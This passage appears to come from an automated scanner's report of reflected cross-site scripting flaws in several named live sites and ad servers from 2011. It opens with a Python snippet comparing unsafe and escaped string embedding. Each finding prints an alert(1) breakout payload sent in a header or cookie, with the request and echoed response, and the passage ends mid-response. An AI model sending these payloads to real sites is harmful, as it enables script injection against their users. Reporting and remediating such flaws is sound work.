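PAYLOAD_SEMICOLON = "154da';alert(1)//fc891691e7e"        # 6.104 / 6.110, after decoding %3b
PAYLOAD_MINUS = "1067f'-alert(1)-'b7f7d77d581"            # 6.109 / 6.117
# Constructed here: this one does not break the literal, it ends the <script> element.
PAYLOAD_CLOSE_TAG = "x</script><script>alert(1)</script>"


def emit_naive(value):
    """The pattern seen in 6.109: the value is dropped into a single-quoted literal unchanged."""
    return "var page_name = '%s';" % value


def js_string(value):
    """A JavaScript string literal that is safe to embed inside a <script> block.
    JSON encoding neutralises quotes and backslashes; the extra \\uXXXX escapes keep
    < > & out of the output so the literal can never form </script> or <!--.
    json.dumps (ensure_ascii=True) also escapes the U+2028/U+2029 line terminators."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def emit_safe(value):
    return "var page_name = %s;" % js_string(value)


_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f", "v": "\v", "0": "\0"}


def read_js_string(src, start):
    """Scan the JavaScript string literal opening at src[start] the way a JS tokenizer
    would; return (decoded value, index just past the closing quote). Handles backslash
    escapes including \\uXXXX (surrogate pairs are not recombined; not needed here)."""
    quote = src[start]
    i, out = start + 1, []
    while i < len(src):
        ch = src[i]
        if ch == "\\":
            nxt = src[i + 1]
            if nxt == "u":
                out.append(chr(int(src[i + 2:i + 6], 16)))
                i += 6
            else:
                out.append(_SIMPLE_ESCAPES.get(nxt, nxt))
                i += 2
        elif ch == quote:
            return "".join(out), i + 1
        else:
            out.append(ch)
            i += 1
    raise ValueError("unterminated string literal")


def split_statement(line):
    """Return (literal value as the JS engine sees it, source text after the literal).
    Anything other than the terminating ';' in the second part is injected code."""
    start = min(i for i in (line.find("'"), line.find('"')) if i >= 0)
    value, end = read_js_string(line, start)
    return value, line[end:]


if __name__ == "__main__":
    for payload in (PAYLOAD_SEMICOLON, PAYLOAD_MINUS, PAYLOAD_CLOSE_TAG):
        for emit in (emit_naive, emit_safe):
            value, rest = split_statement(emit(payload))
            print("%-10s literal=%r  code after literal=%r" % (emit.__name__, value, rest))
```

For the naive template the code after the literal is ;alert(1)//... or -alert(1)-'..., exactly the breakouts the scanner reported; for the JSON-based template the literal holds the whole payload and only the ; remains. The third payload shows why the encoder must also escape <: a JSON string is a valid JS literal, but the HTML parser ends the <script> element at the first </script> before the JS tokenizer ever runs.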

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boomboomflicks.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 6df75'-alert(1)-'66875c09aad

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:49 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=e56256e5ef9fd75705f6b439f10a1357; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 133244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<html><title>Porn Tube
...[SNIP]...
<!--
document.cookie='atref=6df75'-alert(1)-'66875c09aad$$; path=/;'
// -->
...[SNIP]...

6.118. http://www.freshpreservingstore.com/favicon.ico [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.freshpreservingstore.com
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload cade9--><script>alert(1)</script>ab1eeaf5a81 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the reflected data arrives in the User-Agent request header, this is not trivial to exploit against another user: the victim's browser sets that header itself, and an attacker's page cannot make it navigate to the target with a chosen value, so the flaw is reachable only from clients that control their own headers (a proxy, curl, or another non-browser user agent). The Flash-based header-injection techniques mentioned in older scanner output no longer apply in current browsers. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3cade9--><script>alert(1)</script>ab1eeaf5a81
Host: www.freshpreservingstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 03 May 2011 11:40:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8214
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSBSCSBB=FHEFGOODLANAEDBNNEIAHCGH; path=/
Cache-control: private
Set-Cookie: BIGipServerweb_freshpreservingstore_pool=2751467692.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <me
...[SNIP]...
<!-- .66 5/3/2011 7:40:00 AM curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3cade9--><script>alert(1)</script>ab1eeaf5a81 -->
...[SNIP]...

6.119. http://www.prosolutionpills.com/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.prosolutionpills.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 66d34--><script>alert(1)</script>7df68a51f3f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the reflected data arrives in the Referer request header, this is not trivial to exploit against another user: script on an attacker's page cannot set that header directly. The Referer is attacker-influenced all the same. When a victim follows a link from a page the attacker hosts, the browser sends that page's URL as the Referer, and the referring page chooses its own Referrer-Policy: with unsafe-url (or no-referrer-when-downgrade on a same-scheme link) the full URL, injected query string included, reaches the target. The Flash-based header-injection techniques mentioned in older scanner output no longer apply in current browsers. This limitation therefore only partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=66d34--><script>alert(1)</script>7df68a51f3f

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:20:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Tue, 03 May 2011 11:20:07 GMT
P3P: CP="NON NID CURa ADMo TAIo PSAo PSDo OUR NOR COM NAV STA"
Set-Cookie: sswn=eb516b55614f10b9add26227e7a82a7a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: c=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: nn=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: hostid=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/
Set-Cookie: c=1; expires=Mon, 23-Apr-2012 11:20:07 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: nn=0; expires=Mon, 23-Apr-2012 11:20:07 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29393

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Male Enhancement Pills, Natural Penis Enhancement, Penis Pills</title>
<meta
...[SNIP]...
<!-- CURRENT REFERRER: http://www.google.com/search?hl=en&q=66d34--><script>alert(1)</script>7df68a51f3f -->
...[SNIP]...

6.120. http://www.tradearca.com/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tradearca.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e30f9<script>alert(1)</script>15193fec68d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=e30f9<script>alert(1)</script>15193fec68d

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:33:18 GMT
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 40919
Content-Type: text/html
Expires: Mon, 02 May 2011 11:32:18 GMT
Set-Cookie: ASPSESSIONIDCQTTRBQD=KDIHKEODGOIPMJMEIJNJBCLM; path=/
Cache-control: False


<HTML>
<HEAD>
<META NAME="googlebot" CONTENT="noarchive,noarchive,nofollow">
<META NAME="robots" CONTENT="noarchive,noindex,nofollow">
<TITLE>NYSE Arca > Page Not Found</TITLE>

<SCRIPT LANG
...[SNIP]...
<br>http://www.google.com/search?hl=en&q=e30f9<script>alert(1)</script>15193fec68d

               <br>
...[SNIP]...

6.121. http://www.youngtubeclub.com/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youngtubeclub.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fe4b'-alert(1)-'f2df1d0d80e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.youngtubeclub.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 4fe4b'-alert(1)-'f2df1d0d80e

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=7894c473c8235a927af5f4d0ccb84993; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 65679


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Young Tube Club - Free young teen porn sex videos</title>
<meta name="d
...[SNIP]...
<!--
document.cookie='a2r=4fe4b'-alert(1)-'f2df1d0d80e#!; path=/;'
document.cookie='a2x=#!; path=/;'
document.cookie='a2u=0#!; path=/;'
document.cookie='a2b=4fe4b'-alert(1)-'f2df1d0d80e#!; path=/; expires=December 31, 2100;'
// -->
...[SNIP]...

6.122. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10e64"-alert(1)-"2c88e7eb1d8 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=2/1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.05692060776185648 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=933,56,15:826,276,9:1190,1,9; FFad=1:0:2; FFChanCap=1583B1190,1#675962#675816#812963|0,1,1:0,1,1:0,1,1; ZEDOIDX=21; aps=2; FFpb=1190:audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660|0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,2,9:933,56,15:826,276,9:1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:1:0:2;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816#812963,2#894866|0,1,1:0,1,1:0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:42:08 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=67
Expires: Tue, 03 May 2011 15:43:15 GMT
Date: Tue, 03 May 2011 15:42:08 GMT
Connection: close
Content-Length: 2347

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8;z="+Math.random();}

if(zzuid=='unknown')zzuid='@HD0VAoBADQAAGbr14QAAAAA~050311';

var zzhasAd=undefined;


                                   var zzStr = "s=1;u=@HD0VAoBADQAAGbr14QAAAA
...[SNIP]...

6.123. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6d18'-alert(1)-'bdf7ec3c1de was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=2/1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.05692060776185648 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=933,56,15:826,276,9:1190,1,9; FFad=1:0:2; FFChanCap=1583B1190,1#675962#675816#812963|0,1,1:0,1,1:0,1,1; ZEDOIDX=21; aps=2; FFpb=1190:audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660|0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,2,9:933,56,15:826,276,9:1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:1:0:2;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816#812963,2#894866|0,1,1:0,1,1:0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:42:08 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:42:08 GMT
Connection: close
Content-Length: 2347

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de;z="+Math.random();}

if(zzuid=='unknown')zzuid='@HD0VAoBADQAAGbr14QAAAAA
...[SNIP]...

6.124. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74d0c"-alert(1)-"608dd61467a was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~05031174d0c"-alert(1)-"608dd61467a; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:18 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=116
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:18 GMT
Connection: close
Content-Length: 2339

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCus
...[SNIP]...
zuid='-SHATcGt89Z6bBFZFIn3XV-r~05031174d0c"-alert(1)-"608dd61467a';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=-SHATcGt89Z6bBFZFIn3XV-r~05031174d0c"-alert(1)-"608dd61467a;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

6.125. http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rev_lee/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 722dd"%3balert(1)//f296103105c was submitted in the cli cookie. This input was echoed as 722dd";alert(1)//f296103105c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228;ord1=975335;cmpgurl=http%253A//www.maysville-online.com/content/%253Fc3a2e%252522-alert%2528%252522DORK%252522%2529-%252522f8cf8d87874%253D1? HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT; cli=11fda490648f83c722dd"%3balert(1)//f296103105c; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:29 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:29 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:29 GMT
Content-Length: 8193

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11fda490648f83c722dd";alert(1)//f296103105c&seg_code=noseg&ord=1304437409",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii
...[SNIP]...

6.126. http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rev_lee/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cbe0'%3balert(1)//498261d4339 was submitted in the cli cookie. This input was echoed as 6cbe0';alert(1)//498261d4339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228;ord1=975335;cmpgurl=http%253A//www.maysville-online.com/content/%253Fc3a2e%252522-alert%2528%252522DORK%252522%2529-%252522f8cf8d87874%253D1? HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT; cli=11fda490648f83c6cbe0'%3balert(1)//498261d4339; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
